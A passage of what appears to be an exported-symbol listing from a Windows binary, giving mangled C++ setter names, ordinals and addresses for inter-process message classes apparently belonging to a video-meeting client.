              ?Set_ClientNwsCred@CSBMBMessage_NotifyPTLoginInfo@@QAEXABV?$CStringT@_W@Cmm@@@Z49110x41a030
              ?Set_CodeDetail@CSBMBMessage_Assistant_SIP_CallOperationFailNotification@@QAEXABV?$CStringT@D@Cmm@@@Z49120x418380
              ?Set_CodeDetail@CSBMBMessage_Assistant_SIP_OnCallMediaStatusUpdateNotification@@QAEXABV?$CStringT@D@Cmm@@@Z49130x418380
              ?Set_CodeDetail@CSBMBMessage_Assistant_SIP_OnRegistrarNotification@@QAEXABV?$CStringT@D@Cmm@@@Z49140x41cc70
              ?Set_ConfigContent@CSBMBMessage_Assistant_ControlSystem_LoadRequest@@QAEXABV?$CStringT@_W@Cmm@@@Z49150x40c890
              ?Set_ConfigFile@CSBMBMessage_NotifyConfSelected@@QAEXABV?$CStringT@_W@Cmm@@@Z49160x40c810
              ?Set_ContactEmail@CSBMBMessage_Outlook_IMIntegration_GetContactInfo_Request@@QAEXABV?$CStringT@D@Cmm@@@Z49170x40c9b0
              ?Set_ContactEmail@CSBMBMessage_Outlook_IMIntegration_GetContactInfo_Response@@QAEXABV?$CStringT@D@Cmm@@@Z49180x40c9b0
              ?Set_ContactEmail@CSBMBMessage_Outlook_IMIntegration_PhotoChanged_Notification@@QAEXABV?$CStringT@D@Cmm@@@Z49190x40c9b0
              ?Set_ContactEmail@CSBMBMessage_Outlook_IMIntegration_SelfEmail_Response@@QAEXABV?$CStringT@D@Cmm@@@Z49200x40c9b0
              ?Set_ContactEmail@CSBMBMessage_Outlook_IMIntegration_StartAudio_Request@@QAEXABV?$CStringT@D@Cmm@@@Z49210x40c9b0
              ?Set_ContactEmail@CSBMBMessage_Outlook_IMIntegration_StartChat_Request@@QAEXABV?$CStringT@D@Cmm@@@Z49220x40c9b0
              ?Set_ContactEmail@CSBMBMessage_Outlook_IMIntegration_StartVideo_Request@@QAEXABV?$CStringT@D@Cmm@@@Z49230x40c9b0
              ?Set_Content@CSBMBMessage_VDI_DiagLog_Content@@QAEXABV?$CStringT@D@Cmm@@@Z49240x418370
              ?Set_Context@CSBMBMessage_Assistant_ControlSystem_CallDeviceSucceedNotify@@QAEXABV?$CStringT@_W@Cmm@@@Z49250x40c890
              ?Set_ConvertContext@CSBMBMessage_Doc2ImgCancelConvertRequest@@QAEXABV?$CStringT@_W@Cmm@@@Z49260x40c890
              ?Set_ConvertContext@CSBMBMessage_Doc2ImgCancelConvertResponse@@QAEXABV?$CStringT@_W@Cmm@@@Z49270x40c890
              ?Set_ConvertContext@CSBMBMessage_Doc2ImgConvertFinish@@QAEXABV?$CStringT@_W@Cmm@@@Z49280x40c890
              ?Set_ConvertContext@CSBMBMessage_Doc2ImgConvertProgress@@QAEXABV?$CStringT@_W@Cmm@@@Z49290x40c890
              ?Set_ConvertContext@CSBMBMessage_Doc2ImgStartConvertRequest@@QAEXABV?$CStringT@_W@Cmm@@@Z49300x40c890
              ?Set_ConvertContext@CSBMBMessage_Doc2ImgStartConvertResponse@@QAEXABV?$CStringT@_W@Cmm@@@Z49310x40c890
              ?Set_CountryCode@CSBMBMessage_CCIVideoInviteByPhoneRequest@@QAEXABV?$CStringT@_W@Cmm@@@Z49320x40c890
              ?Set_CountrysJson@CSBMBMessage_CCIVideoGetSupportCountryInfoResponse@@QAEXABV?$CStringT@_W@Cmm@@@Z49330x417f10
              ?Set_CurUserJson@CSBMBMessage_CCIVideoGetCurrentUserResponse@@QAEXABV?$CStringT@_W@Cmm@@@Z49340x417f10
              ?Set_DALAPI@CSBMBMessage_Assistant_Broadcast_Network_Audio_Config_Proxy_Request@@QAEXAB_J@Z49350x41dc00
              ?Set_DALAPI@CSBMBMessage_Assistant_DAL_Service_Service_Ready_Notification@@QAEXAB_J@Z49360x41f270
              ?Set_DALDeviceName@CSBMBMessage_Assistant_DAL_Service_Service_Ready_Notification@@QAEXABV?$CStringT@D@Cmm@@@Z49370x41d930
              ?Set_DeclineMessage@CSBMBMessage_NotifyMeetingCallResponse@@QAEXABV?$CStringT@_W@Cmm@@@Z49380x426c80
              ?Set_Description@CSBMBMessage_PromptProxyAuth@@QAEXABV?$CStringT@_W@Cmm@@@Z49390x41a5f0
              ?Set_DeviceID@CSBMBMessage_Assistant_ControlSystem_DoOperationRequest@@QAEXABV?$CStringT@_W@Cmm@@@Z49400x40c810
              ?Set_DeviceType@CSBMessage_Assistant_AudioDeviceUpdateNotification@@QAEXABI@Z49410x40c800
              ?Set_DisplayName@CSBMBMessage_UserUpdateName@@QAEXABV?$CStringT@_W@Cmm@@@Z49420x417f20
              ?Set_DocFilePath@CSBMBMessage_Doc2ImgStartConvertRequest@@QAEXABV?$CStringT@_W@Cmm@@@Z49430x417f10
              ?Set_Domain@CSBMBMessage_CCIVideoSetDomainRequest@@QAEXABV?$CStringT@_W@Cmm@@@Z49440x40c890
              ?Set_DstCallid@CSBMBMessage_Assistant_SIP_MergeCallResponse@@QAEXABV?$CStringT@D@Cmm@@@Z49450x418380
              ?Set_DstLineCallId@CSBMBMessage_Assistant_LineCallMergedNotification@@QAEXABV?$CStringT@D@Cmm@@@Z49460x41a2d0
              ?Set_EndType@CSBMBMessage_CCIVideoEndVideoNotify@@QAEXABH@Z49470x40c800
              ?Set_EndType@CSBMBMessage_CCIVideoEndVideoRequest@@QAEXABH@Z49480x40c800
              ?Set_ErrCode@CSBMBMessage_CCIVideoJoinMeetingResponse@@QAEXABH@Z49490x418e60
              ?Set_ErrCode@CSBMBMessage_ConfirmConfLeave@@QAEXABI@Z49500x419aa0
              ?Set_ErrDetailCode@CSBMBMessage_CCIVideoJoinMeetingResponse@@QAEXABH@Z49510x419080
              ?Set_ErrorCode@CSBMBMessage_Assistant_SIP_SwitchCallToCarrierResponse@@QAEXABH@Z49520x419a80
              ?Set_Event@CSBMBMessage_Assistant_SIP_AutoRecordingEvent@@QAEXABH@Z49530x417560
              ?Set_Event@CSBMBMessage_Assistant_SIP_RemoteMergerEvent@@QAEXABH@Z49540x417560
              ?Set_EventID@CSBMBMessage_NotifyAppEvent@@QAEXABI@Z49550x40c800
              ?Set_EventID@CSBMBMessage_OutlookMAPIEventChangeNotify@@QAEXABV?$CStringT@_W@Cmm@@@Z49560x40c810
              ?Set_ExternalInfo@CSBMBMessage_IPCSDK_SDKCmdNotify@@QAEXABV?$CStringT@D@Cmm@@@Z49570x41a2d0
              ?Set_ExternalInfo@CSBMBMessage_IPCSDK_SDKCmdRequest@@QAEXABV?$CStringT@D@Cmm@@@Z49580x41a2d0
              ?Set_FailReason@CSBMBMessage_Assistant_SIP_AudioDeviceFailNotification@@QAEXABH@Z49590x40c800
              ?Set_FailReason@CSBMBMessage_Assistant_SIP_CallOperationFailNotification@@QAEXABH@Z49600x417560
              ?Set_FailoverReason@CSBMBMessage_NotifyConferenceStatus@@QAEXABI@Z49610x418770
              ?Set_FilePrefix@CSBMBMessage_NotifyStartRecording@@QAEXABV?$CStringT@_W@Cmm@@@Z49620x41a910
              ?Set_FirstName@CSBMBMessage_UserUpdateName@@QAEXABV?$CStringT@_W@Cmm@@@Z49630x40c890
              ?Set_Flag@CSBMBMessage_NotifyNetworkStateChanged@@QAEXABI@Z49640x417bf0
              ?Set_Flags@CSBMBMessage_UpdateOpFlags@@QAEXABV?$CStringT@D@Cmm@@@Z49650x40c9b0
              ?Set_FreeMeetingElapsedTime@CSBMBMessage_ConfirmConfLeave@@QAEXABI@Z49660x419be0
              ?Set_FromApp@CSBMBMessage_AudioFacilityStatus@@QAEXABH@Z49670x40c800
              ?Set_FromApp@CSBMBMessage_OperateAudioFacilityParam@@QAEXABH@Z49680x40c800
              ?Set_FromApp@CSBMBMessage_OperateChatFacilityParam@@QAEXABH@Z49690x40c800
              ?Set_FromApp@CSBMBMessage_OperateScreenShareFacilityParam@@QAEXABH@Z49700x40c800
              ?Set_FromApp@CSBMBMessage_OperateVideoFacilityParam@@QAEXABH@Z49710x40c800
              ?Set_FromDevice@CSBMBMessage_CCIVideoMuteAudioRequest@@QAEXABH@Z49720x419a80
              ?Set_GroupId@CSBMBMessage_LogService_StartChannel@@QAEXABI@Z49730x417bf0
              ?Set_GroupId@CSBMBMessage_LogService_SubChannelAdd@@QAEXABI@Z49740x417bf0
              ?Set_HasMessage@CSBMBMessage_Assistant_SIP_MessageCountChanged@@QAEXABH@Z49750x418e60
              ?Set_HasZoomIM@CSBMBMessage_NotifyPTLoginInfo@@QAEXABH@Z49760x417bf0
              ?Set_HostSnsType@CSBMBMessage_NotifyClaimHost@@QAEXABH@Z49770x40c800
              ?Set_IPCAction@CSBMBMessage_OutlookRequest@@QAEXABI@Z49780x417560
              ?Set_IPCAction@CSBMBMessage_OutlookResponse@@QAEXABI@Z49790x417560
              ?Set_ImageLink@CSBMBMessage_CCIVideoSetVBRequest@@QAEXABV?$CStringT@_W@Cmm@@@Z49800x40c890
              ?Set_ImgFolderPath@CSBMBMessage_Doc2ImgStartConvertRequest@@QAEXABV?$CStringT@_W@Cmm@@@Z49810x417f20
              ?Set_ImgFolderPath@CSBMBMessage_Doc2ImgStartConvertResponse@@QAEXABV?$CStringT@_W@Cmm@@@Z49820x41a5f0
              ?Set_ImgFormat@CSBMBMessage_Doc2ImgStartConvertRequest@@QAEXABV?$CStringT@_W@Cmm@@@Z49830x417f40
              ?Set_InMeetingFlag@CSBMBMessage_ConfirmConfLeave@@QAEXAB_K@Z49840x419b60
              ?Set_Information@CSBMBMessage_KeepAlive@@QAEXABV?$CStringT@_W@Cmm@@@Z49850x417f10
              ?Set_IpAddr@CSBMBMessage_Assistant_SIP_SuspendToResume@@QAEXABV?$CStringT@D@Cmm@@@Z49860x418370
              ?Set_IsBasicPlusMeeting@CSBMBMessage_ConfirmConfLeave@@QAEXABH@Z49870x419b90
              ?Set_IsDIDNumber@CSBMBMessage_NotifyPTCallPeer@@QAEXABH@Z49880x41aef0
              ?Set_IsHost@CSBMBMessage_ConfirmConfLeave@@QAEXABH@Z49890x419b30
              ?Set_IsIncomingCall@CSBMBMessage_Assistant_SIP_OnCallStatusUpdateNotification@@QAEXABH@Z49900x41d360
              ?Set_IsLogin@CSBMBMessage_RealNameAuthInfo@@QAEXABH@Z49910x40c800
              ?Set_IsMeetingShowExtendDialog@CSBMBMessage_ConfirmConfLeave@@QAEXABH@Z49920x419bc0
              ?Set_IsPrivacyName@CSBMBMessage_NotifyPTCallPeer@@QAEXABH@Z49930x41af10
              ?Set_JMAK@CSBMBMessage_NotifyJoinFailForForceUpdate@@QAEXABV?$CStringT@_W@Cmm@@@Z49940x41a030
              ?Set_JMFLog@CSBMBMessage_ConfirmConfLeave@@QAEXABH@Z49950x419ad0
              ?Set_JoinErrorCode@CSBMBMessage_VDI_Chrome_JoinErrorInfo@@QAEXABI@Z49960x40c800
              ?Set_JoinErrorMessage@CSBMBMessage_VDI_Chrome_JoinErrorInfo@@QAEXABV?$CStringT@D@Cmm@@@Z49970x418370
              ?Set_JoinType@CSBMBMessage_NotifyJoinFailForForceUpdate@@QAEXABV?$CStringT@_W@Cmm@@@Z49980x41a000
              ?Set_JsCallID@CSBMBMessage_CCIVideoCancelInviteByPhoneRequest@@QAEXABV?$CStringT@_W@Cmm@@@Z49990x40c890
              ?Set_JsCallID@CSBMBMessage_CCIVideoGetCurrentUserRequest@@QAEXABV?$CStringT@_W@Cmm@@@Z50000x40c890
              ?Set_JsCallID@CSBMBMessage_CCIVideoGetCurrentUserResponse@@QAEXABV?$CStringT@_W@Cmm@@@Z50010x40c890
              ?Set_JsCallID@CSBMBMessage_CCIVideoGetSupportCountryInfoRequest@@QAEXABV?$CStringT@_W@Cmm@@@Z50020x40c890
              ?Set_JsCallID@CSBMBMessage_CCIVideoGetSupportCountryInfoResponse@@QAEXABV?$CStringT@_W@Cmm@@@Z50030x40c890
              ?Set_JsCallID@CSBMBMessage_CCIVideoGetUserListRequest@@QAEXABV?$CStringT@_W@Cmm@@@Z50040x40c890
              ?Set_JsCallID@CSBMBMessage_CCIVideoGetUserListResponse@@QAEXABV?$CStringT@_W@Cmm@@@Z50050x40c890
              ?Set_JsCallid@CSBMBMessage_CCIVideoJoinMeetingResponse@@QAEXABV?$CStringT@_W@Cmm@@@Z50060x41af80
              ?Set_Json@CSBMBMessage_Assistant_ControlSystem_DevicesPreparedNotify@@QAEXABV?$CStringT@_W@Cmm@@@Z50070x40c890
              ?Set_Json@CSBMBMessage_Assistant_ControlSystem_DevicesUpdatedNotify@@QAEXABV?$CStringT@_W@Cmm@@@Z50080x40c890
              ?Set_Json@CSBMBMessage_Assistant_ControlSystem_ScenesPreparedNotify@@QAEXABV?$CStringT@_W@Cmm@@@Z50090x40c890
              ?Set_JsonMsg@CSBMBMessage_CCIVideoChangeBtnStatusRequest@@QAEXABV?$CStringT@D@Cmm@@@Z50100x40c9b0
              ?Set_JsonValue@CSBMBMessage_UpdateCallSessionSummaryResponse@@QAEXABV?$CStringT@D@Cmm@@@Z50110x40c9b0
              ?Set_Key@CSBMBMessage_Assistant_SIP_CallUpdateKeyValueNotification@@QAEXABV?$CStringT@D@Cmm@@@Z50120x40c9b0
              ?Set_Key@CSBMBMessage_Assistant_SIP_CallUpdateKeyValueNotificationWithCallID@@QAEXABV?$CStringT@D@Cmm@@@Z50130x41a2d0
              ?Set_Key@CSBMBMessage_LCPRecordOperate@@QAEXABV?$CStringT@_W@Cmm@@@Z50140x40c890
              ?Set_Key@CSBMBMessage_UpdateKeyValueInfo@@QAEXABV?$CStringT@_W@Cmm@@@Z50150x40c890
              ?Set_LastName@CSBMBMessage_UserUpdateName@@QAEXABV?$CStringT@_W@Cmm@@@Z50160x417f10
              ?Set_Leave@CSBMBMessage_ConfirmConfLeave@@QAEXABH@Z50170x419a80
              ?Set_LineCallId@CSBMBMessage_Assistant_SIP_LineCallTerminatedNotification@@QAEXABV?$CStringT@D@Cmm@@@Z50180x40c9b0
              ?Set_LineCallId@CSBMBMessage_UpdateRegisterServer@@QAEXABV?$CStringT@D@Cmm@@@Z50190x40c9b0
              ?Set_LineId@CSBMBMessage_Assistant_SIP_OnRegistrarNotification@@QAEXABV?$CStringT@D@Cmm@@@Z50200x40c9b0
              ?Set_LiveSteamViewUrl@CSBMBMessage_ConfirmConfLeave@@QAEXABV?$CStringT@_W@Cmm@@@Z50210x419b00
              ?Set_LocalIP@CSBMBMessage_CheckNomadic911_Notification@@QAEXABV?$CStringT@D@Cmm@@@Z50220x418370
              ?Set_Log@CSBMBMessage_UploadPbxRealTimeMonitorLog@@QAEXABV?$CStringT@D@Cmm@@@Z50230x40c9b0
              ?Set_MeetingID@CSBMBMessage_InviteBuddyToMeeting@@QAEXABV?$CStringT@_W@Cmm@@@Z50240x417f10
              ?Set_MeetingID@CSBMBMessage_KeepAlive@@QAEXABV?$CStringT@_W@Cmm@@@Z50250x40c890
              ?Set_MeetingID@CSBMBMessage_NotifyCallCommand@@QAEXABV?$CStringT@_W@Cmm@@@Z50260x40c890
              ?Set_MeetingID@CSBMBMessage_NotifyConfPListChanged@@QAEXABV?$CStringT@_W@Cmm@@@Z50270x40c890
              ?Set_MeetingID@CSBMBMessage_NotifyConferenceStatus@@QAEXABV?$CStringT@_W@Cmm@@@Z50280x40c890
              ?Set_MeetingID@CSBMBMessage_NotifyInviteFBBuddy@@QAEXABV?$CStringT@_W@Cmm@@@Z50290x40c890
              ?Set_MeetingID@CSBMBMessage_NotifyStartLogin@@QAEXABV?$CStringT@_W@Cmm@@@Z50300x417f10
              ?Set_MeetingID@CSBMBMessage_NotifyUpdateDisclaimerStatus@@QAEXABV?$CStringT@_W@Cmm@@@Z50310x417f20
              ?Set_MeetingID@CSBMBMessage_OpenInviteRoomSystemCalloutTab@@QAEXABV?$CStringT@_W@Cmm@@@Z50320x40c890
              ?Set_MeetingNo@CSBMBMessage_NotifyJoinFailForForceUpdate@@QAEXAB_J@Z50330x41a8d0
              ?Set_MeetingNo@CSBMBMessage_NotifySaveChat@@QAEXAB_J@Z50340x41a8d0
              ?Set_MeetingNo@CSBMBMessage_NotifyStartRecording@@QAEXAB_J@Z50350x41a8d0
              ?Set_MeetingNum@CSBMBMessage_Assistant_SIP_JoinMeetingRequest@@QAEXAB_J@Z50360x40c8a0
              ?Set_MeetingNum@CSBMBMessage_Assistant_SIP_UpgradeToMeetingRequest@@QAEXAB_J@Z50370x40c8a0
              ?Set_MeetingNum@CSBMBMessage_InviteBuddyToMeeting@@QAEXAB_J@Z50380x424960
              ?Set_MeetingNumber@CSBMBMessage_NotifyConferenceStatus@@QAEXAB_J@Z50390x40c8a0
              ?Set_MeetingNumber@CSBMBMessage_NotifyInviteFBBuddy@@QAEXAB_J@Z50400x4185c0
              ?Set_MeetingNumber@CSBMBMessage_NotifyUpdateDisclaimerStatus@@QAEXABV?$CStringT@_W@Cmm@@@Z50410x417f10
              ?Set_MeetingNumber@CSBMBMessage_OpenInviteRoomSystemCalloutTab@@QAEXAB_J@Z50420x40c8a0
              ?Set_MeetingTopic@CSBMBMessage_NotifySaveChat@@QAEXABV?$CStringT@_W@Cmm@@@Z50430x41a8f0
              ?Set_MeetingTopic@CSBMBMessage_NotifyStartRecording@@QAEXABV?$CStringT@_W@Cmm@@@Z50440x41a8f0
              ?Set_MeetingTypes@CSBMBMessage_Assistant_SIP_JoinMeetingRequest@@QAEXABH@Z50450x41d910
              ?Set_MemberName@CSBMBMessage_Assistant_SIP_RemoteMergerEvent@@QAEXABV?$CStringT@D@Cmm@@@Z50460x418380
              ?Set_MemberNumber@CSBMBMessage_Assistant_SIP_RemoteMergerEvent@@QAEXABV?$CStringT@D@Cmm@@@Z50470x41d330
              ?Set_MethodID@CSBMBMessage_Assistant_ControlSystem_DoOperationRequest@@QAEXABV?$CStringT@_W@Cmm@@@Z50480x418b80
              ?Set_MinClientVersion@CSBMBMessage_NotifyJoinFailForForceUpdate@@QAEXABV?$CStringT@_W@Cmm@@@Z50490x41a910
              ?Set_MsgID@CSBMBMessage_UploadFeedback@@QAEXABH@Z50500x40c800
              ?Set_MsgType@CSBMBMessage_NotifyMeetingCallResponse@@QAEXABI@Z50510x40c800
              ?Set_MyScreenName@CSBMBMessage_NotifyUpdateDisclaimerStatus@@QAEXABV?$CStringT@_W@Cmm@@@Z50520x40c890
              ?Set_Name@CSBMBMessage_Assistant_ControlSystem_ExecuteRuleRequest@@QAEXABV?$CStringT@_W@Cmm@@@Z50530x40c890
              ?Set_Name@CSBMBMessage_CCIVideoInviteByPhoneRequest@@QAEXABV?$CStringT@_W@Cmm@@@Z50540x417f20
              ?Set_Name@CSBMBMessage_NotifyPTCallPeer@@QAEXABV?$CStringT@_W@Cmm@@@Z50550x417f10
              ?Set_Name@CSBMBMessage_UpdateFeatureToggle@@QAEXABV?$CStringT@D@Cmm@@@Z50560x40c9b0
              ?Set_NameSpace@CSBMBMessage_IPCSDK_SDKCmdNotify@@QAEXABV?$CStringT@D@Cmm@@@Z50570x40c9b0
              ?Set_NameSpace@CSBMBMessage_IPCSDK_SDKCmdRequest@@QAEXABV?$CStringT@D@Cmm@@@Z50580x40c9b0
              ?Set_NeedUserConfirm@CSBMBMessage_OperateAudioFacilityParam@@QAEXABH@Z50590x419080
              ?Set_NeedUserConfirm@CSBMBMessage_OperateChatFacilityParam@@QAEXABH@Z50600x418e60
              ?Set_NeedUserConfirm@CSBMBMessage_OperateScreenShareFacilityParam@@QAEXABH@Z50610x418e60
              ?Set_NeedUserConfirm@CSBMBMessage_OperateVideoFacilityParam@@QAEXABH@Z50620x418e60
              ?Set_NetworkState@CSBMBMessage_NotifyNetworkSwitch@@QAEXABI@Z50630x40c800
              ?Set_NewCount@CSBMBMessage_Assistant_SIP_MessageCountChanged@@QAEXABI@Z50640x417bf0
              ?Set_NewHostCallid@CSBMBMessage_Assistant_SIP_MergeCallHostChanged@@QAEXABV?$CStringT@D@Cmm@@@Z50650x418380
              ?Set_NotifyType@CSBMBMessage_OutlookMAPIEventChangeNotify@@QAEXABI@Z50660x40c800
              ?Set_OldCount@CSBMBMessage_Assistant_SIP_MessageCountChanged@@QAEXABI@Z50670x40c800
              ?Set_OldHostCallid@CSBMBMessage_Assistant_SIP_MergeCallHostChanged@@QAEXABV?$CStringT@D@Cmm@@@Z50680x418370
              ?Set_OperateType@CSBMBMessage_OperateAudioFacilityParam@@QAEXABH@Z50690x418e60
              ?Set_OperateType@CSBMBMessage_OperateChatFacilityParam@@QAEXABH@Z50700x417bf0
              ?Set_OperateType@CSBMBMessage_OperateScreenShareFacilityParam@@QAEXABH@Z50710x417bf0
              ?Set_OperateType@CSBMBMessage_OperateVideoFacilityParam@@QAEXABH@Z50720x417bf0
              ?Set_OperationType@CSBMBMessage_LCPRecordOperate@@QAEXABH@Z50730x418d00
              ?Set_Options@CSBMBMessage_UploadFeedback@@QAEXAB_J@Z50740x418910
              ?Set_P1@CSBMBMessage_AddClientLog@@QAEXABV?$CStringT@_W@Cmm@@@Z50750x40c810
              ?Set_P2@CSBMBMessage_AddClientLog@@QAEXABV?$CStringT@_W@Cmm@@@Z50760x418b80
              ?Set_P3@CSBMBMessage_AddClientLog@@QAEXABV?$CStringT@_W@Cmm@@@Z50770x418b90
              ?Set_P4@CSBMBMessage_AddClientLog@@QAEXABV?$CStringT@_W@Cmm@@@Z50780x418bb0
              ?Set_P5@CSBMBMessage_AddClientLog@@QAEXABV?$CStringT@_W@Cmm@@@Z50790x419880
              ?Set_PTNotified@CSBMBMessage_CCIVideoEndVideoNotify@@QAEXABH@Z50800x418e60
              ?Set_PageImgPath@CSBMBMessage_Doc2ImgConvertProgress@@QAEXABV?$CStringT@_W@Cmm@@@Z50810x41b460
              ?Set_PageIndexFinished@CSBMBMessage_Doc2ImgConvertProgress@@QAEXABI@Z50820x419aa0
              ?Set_PageNumSuccess@CSBMBMessage_Doc2ImgConvertFinish@@QAEXABI@Z50830x419a80
              ?Set_PageNumTotal@CSBMBMessage_Doc2ImgConvertProgress@@QAEXABI@Z50840x419a80
              ?Set_PageNumTotal@CSBMBMessage_Doc2ImgStartConvertResponse@@QAEXABI@Z50850x419a80
              ?Set_Param@CSBMBMessage_HeartBeatRequest@@QAEXABI@Z50860x40c800
              ?Set_Param@CSBMBMessage_NotifyAppEvent@@QAEXABV?$CStringT@_W@Cmm@@@Z50870x40c810
              ?Set_Param@CSBMBMessage_NotifyDeviceReady@@QAEXABV?$CStringT@_W@Cmm@@@Z50880x40c890
              ?Set_Param@CSBMBMessage_NotifyEndSetting@@QAEXABI@Z50890x40c800
              ?Set_Param@CSBMBMessage_NotifyJoinByMeetingNumber@@QAEXABI@Z50900x40c800
              ?Set_Param@CSBMBMessage_NotifyOpenDialPad@@QAEXABI@Z50910x40c800
              ?Set_Param@CSBMBMessage_NotifyStartSetting@@QAEXABI@Z50920x40c800
              ?Set_ParamID@CSBMBMessage_Assistant_ControlSystem_DoOperationRequest@@QAEXABV?$CStringT@_W@Cmm@@@Z50930x418b90
              ?Set_Parameter@CSBMBMessage_NotifyUpgradeAccount@@QAEXABV?$CStringT@_W@Cmm@@@Z50940x40c890
              ?Set_Password@CSBMBMessage_NotifyJoinFailForForceUpdate@@QAEXABV?$CStringT@_W@Cmm@@@Z50950x41a8f0
              ?Set_Password@CSBMBMessage_NotifyStartLogin@@QAEXABV?$CStringT@_W@Cmm@@@Z50960x417f20
              ?Set_Password@CSBMBMessage_NotifyUserInputProxyAuth@@QAEXABV?$CStringT@_W@Cmm@@@Z50970x41a720
              ?Set_Path@CSBMBMessage_NotifySaveChat@@QAEXABV?$CStringT@_W@Cmm@@@Z50980x41a900
              ?Set_Path@CSBMBMessage_NotifyStartRecording@@QAEXABV?$CStringT@_W@Cmm@@@Z50990x41a900
              ?Set_PeerDisplayName@CSBMBMessage_Assistant_SIP_OnCallStatusUpdateNotification@@QAEXABV?$CStringT@D@Cmm@@@Z51000x41d340
              ?Set_PeerNumber@CSBMBMessage_Assistant_SIP_OnCallStatusUpdateNotification@@QAEXABV?$CStringT@D@Cmm@@@Z51010x41d330
              ?Set_PeerURI@CSBMBMessage_Assistant_SIP_OnCallStatusUpdateNotification@@QAEXABV?$CStringT@D@Cmm@@@Z51020x418380
              ?Set_Permanent@CSBMBMessage_VTLSConfirm@@QAEXABH@Z51030x41be80
              ?Set_PhoneNumber@CSBMBMessage_CCIVideoInviteByPhoneRequest@@QAEXABV?$CStringT@_W@Cmm@@@Z51040x417f10
              ?Set_PhoneNumber@CSBMBMessage_NotifyPTCallPeer@@QAEXABV?$CStringT@_W@Cmm@@@Z51050x40c890
              ?Set_PhoneNumber@CSBMBMessage_Outlook_IMIntegration_StartAudio_Request@@QAEXABV?$CStringT@D@Cmm@@@Z51060x41a2d0
              ?Set_PhotoPath@CSBMBMessage_Outlook_IMIntegration_GetContactInfo_Response@@QAEXABV?$CStringT@D@Cmm@@@Z51070x41d330
              ?Set_PhotoPath@CSBMBMessage_Outlook_IMIntegration_PhotoChanged_Notification@@QAEXABV?$CStringT@D@Cmm@@@Z51080x41a2d0
              ?Set_PicPath@CSBMBMessage_UserUploadPicture@@QAEXABV?$CStringT@_W@Cmm@@@Z51090x40c890
              ?Set_PmiName@CSBMBMessage_Assistant_SIP_JoinMeetingRequest@@QAEXABV?$CStringT@D@Cmm@@@Z51100x41d7e0
              ?Set_Policies@CSBMBMessage_Assistant_SIP_ReceiveRealtimePolicesNotification@@QAEXAB_J@Z51110x40c8a0
              ?Set_Port@CSBMBMessage_NotifyUserInputProxyAuth@@QAEXABI@Z51120x419a80
              ?Set_Port@CSBMBMessage_PromptProxyAuth@@QAEXABI@Z51130x419a80
              ?Set_PreviewUrl@CSBMBMessage_NotifyStartAppShare@@QAEXABV?$CStringT@_W@Cmm@@@Z51140x417f10
              ?Set_ProcessID@CSBMBMessage_Assistant_Exit_Process@@QAEXABI@Z51150x40c800
              ?Set_ProcessID@CSBMBMessage_NotifyAssistantStart@@QAEXABI@Z51160x40c800
              ?Set_ProcessID@CSBMBMessage_NotifyAssistantStop@@QAEXABI@Z51170x40c800
              ?Set_ProcessID@CSBMBMessage_NotifyConfStart@@QAEXABI@Z51180x40c800
              ?Set_ProcessID@CSBMBMessage_NotifyConfStop@@QAEXABI@Z51190x40c800
              ?Set_ProcessID@CSBMBMessage_Notify_PT_Process_PID@@QAEXABI@Z51200x40c800
              ?Set_ProcessID@SBIPCMessage_Connect@@QAEXABI@Z51210x40c800
              ?Set_ProcessID@SBIPCMessage_ConnectResponse@@QAEXABI@Z51220x40c800
              ?Set_ProcessID@SBIPCMessage_DisConnect@@QAEXABI@Z51230x40c800
              ?Set_ProcessName@CSBMBMessage_NotifyAssistantStart@@QAEXABV?$CStringT@D@Cmm@@@Z51240x418370
              ?Set_ProcessName@CSBMBMessage_NotifyAssistantStop@@QAEXABV?$CStringT@D@Cmm@@@Z51250x418370
              ?Set_ProcessName@CSBMBMessage_NotifyConfStart@@QAEXABV?$CStringT@D@Cmm@@@Z51260x418370
              ?Set_ProcessName@CSBMBMessage_NotifyConfStop@@QAEXABV?$CStringT@D@Cmm@@@Z51270x418370
              ?Set_Protocol@CSBMBMessage_UpdateRegisterServer@@QAEXABH@Z51280x418d00
              ?Set_ProxyServer@CSBMBMessage_UpdateRegisterServer@@QAEXABV?$CStringT@D@Cmm@@@Z51290x41a2e0
              ?Set_Reason@CSBMBMessage_ConfirmConfLeave@@QAEXABV?$CStringT@_W@Cmm@@@Z51300x40c890
              ?Set_Reason@CSBMBMessage_NotifyActivateConf@@QAEXABV?$CStringT@_W@Cmm@@@Z51310x40c890
              ?Set_Reason@CSBMBMessage_NotifyAppActive@@QAEXABV?$CStringT@D@Cmm@@@Z51320x40c9b0
              ?Set_Reason@CSBMBMessage_NotifyAppInActive@@QAEXABV?$CStringT@D@Cmm@@@Z51330x40c9b0
              ?Set_Reason@CSBMBMessage_NotifyConfSelected@@QAEXABI@Z51340x40c800
              ?Set_Reason@CSBMBMessage_NotifyLeaveConf@@QAEXABV?$CStringT@_W@Cmm@@@Z51350x40c890
              ?Set_Reason@CSBMBMessage_NotifyStartLogin@@QAEXABV?$CStringT@_W@Cmm@@@Z51360x40c890
              ?Set_Reason@CSBMBMessage_TermConf@@QAEXABV?$CStringT@_W@Cmm@@@Z51370x40c890
              ?Set_ReasonCode@CSBMBMessage_CCIVideoEndVideoNotify@@QAEXABH@Z51380x417bf0
              ?Set_ReasonCode@CSBMBMessage_CCIVideoInviteByPhoneStatusNotify@@QAEXABH@Z51390x417bf0
              ?Set_RecordOption@CSBMBMessage_NotifyStartRecording@@QAEXABI@Z51400x41a920
              ?Set_RecordScreen@CSBMBMessage_CCIVideoJoinMeetingResponse@@QAEXABH@Z51410x417bf0
              ?Set_RecordingState@CSBMBMessage_CCIVideoRecordingStateChangeNotify@@QAEXABH@Z51420x40c800
              ?Set_RecoveryCommand@CSBMBMessage_NotifyConfStart@@QAEXABV?$CStringT@D@Cmm@@@Z51430x418380
              ?Set_Registrar@CSBMBMessage_UpdateRegisterServer@@QAEXABV?$CStringT@D@Cmm@@@Z51440x41a2d0
              ?Set_RemoteCapability@CSBMBMessage_Assistant_SIP_RemoteMergerEvent@@QAEXAB_J@Z51450x41dc00
              ?Set_RequestInfo@CSBMBMessage_IPCSDK_SDKCmdRequest@@QAEXABV?$CStringT@D@Cmm@@@Z51460x41a2e0
              ?Set_RequestInfo@CSBMBMessage_OutlookRequest@@QAEXABV?$CStringT@D@Cmm@@@Z51470x40c9b0
              ?Set_RequestInfo@CSBMBMessage_OutlookStartMeetingRequest@@QAEXABV?$CStringT@D@Cmm@@@Z51480x40c9b0
              ?Set_RespCode@CSBMBMessage_Assistant_SIP_OnRegistrarNotification@@QAEXABH@Z51490x419a80
